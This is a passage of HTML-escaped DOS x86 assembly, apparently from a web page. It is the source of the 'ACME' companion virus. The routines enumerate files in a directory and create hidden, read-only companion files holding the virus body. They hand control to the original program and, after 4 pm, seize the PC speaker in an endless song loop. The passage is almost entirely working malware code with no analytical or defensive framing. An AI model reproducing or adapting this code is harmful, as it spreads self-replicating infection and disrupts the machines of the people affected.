&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Does the file exist?&lt;br /&gt;
&lt;br /&gt;
Check_file:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,OFFSET FILE_CREATE&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,3d00h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Open file, read only&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
Chk_done:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
;------------------------------------------------------------------;&lt;br /&gt;
Infect_file:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;create companion routine&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,OFFSET FILE_CREATE&amp;nbsp;&amp;nbsp; ;contains name of "companion"&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,3ch&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;construct file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EXIT&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Write virus to companion file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,OFFSET START&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,40h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;write to file function&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;do it&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Close file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,3eh&amp;nbsp;&amp;nbsp;&amp;nbsp; ; ASSUMES bx still has file handle&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Change attributes&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,OFFSET FILE_CREATE&amp;nbsp;&amp;nbsp; ;of created file to&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;(1) read only and (2) hidden&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4301h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
;------------------------------------------------------------------&lt;br /&gt;
; Read all the directory filenames and store as records in buffer. &lt;br /&gt;
;------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Vir_begin:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,02Ch&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;DOS get time function&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 021h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,ch&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Copy hour into AL&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cbw&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Sign-extend AL into AX&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0010h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;Did the function return 16 (4 pm)?&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jge&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; TOON&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;If greater than or equal, muzik!&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; sp,offset STACK_HERE&amp;nbsp;&amp;nbsp; ;move stack down&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,sp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,15&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cl,4&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; shr&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,cl&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,4ah&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;deallocate rest of memory&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,OFFSET FILE_CLONE&amp;nbsp;&amp;nbsp; ;Point to buffer.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,OFFSET FILE_FOUND&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
&lt;br /&gt;
Read_dir:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,OFFSET WILDCARD&amp;nbsp;&amp;nbsp; ;file mask for directory search&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,SEARCH_ATTRIB&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,4Eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;find the first matching file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EXIT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;If empty directory, exit&lt;br /&gt;
&lt;br /&gt;
Do_file:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp; STORE_NAME&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp; CHECK_FILE&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp; INFECT_FILE&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Find_next:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp; ah,4fh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; find next file and keep finding until&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp; 21h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; all &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jnz&amp;nbsp;&amp;nbsp; Do_File&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; infected&lt;br /&gt;
&lt;br /&gt;
Exit:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; ; Run the original program&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp; Prepare_command&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si, OFFSET MY_CMD&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 2Eh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Pass command to command&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; ; interpreter for execution&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4C00H&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Exit to DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
&lt;br /&gt;
;-------------------------------------------------------------------&lt;br /&gt;
;This routine enables ACME virus to compel the pc to play the &lt;br /&gt;
;ACME virus song just about the time the clock-watchers are getting&lt;br /&gt;
;ready to leave&lt;br /&gt;
;-------------------------------------------------------------------&lt;br /&gt;
TOON:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cli&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;interrupts off&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,10110110xb&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;the number&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; out&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 43h,al&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;to send to the speaker&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; lea&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; si,MUZIK&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;point (si) to the ACME note table&lt;br /&gt;
&lt;br /&gt;
TOON2:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; lodsw&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;load word into ax and increment (si)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0ffffh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;is it ffff? If so, end of table&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; jz&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; GO_MUZIK2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;so, time to jump into endless loop&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; out&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 42h,al&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,ah&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; out&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 42h,al&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;send it next&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; in&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,61h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;get value to turn on speaker&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,00000011xb&amp;nbsp;&amp;nbsp;&amp;nbsp; ;OR the gotten value&lt;br /&gt;
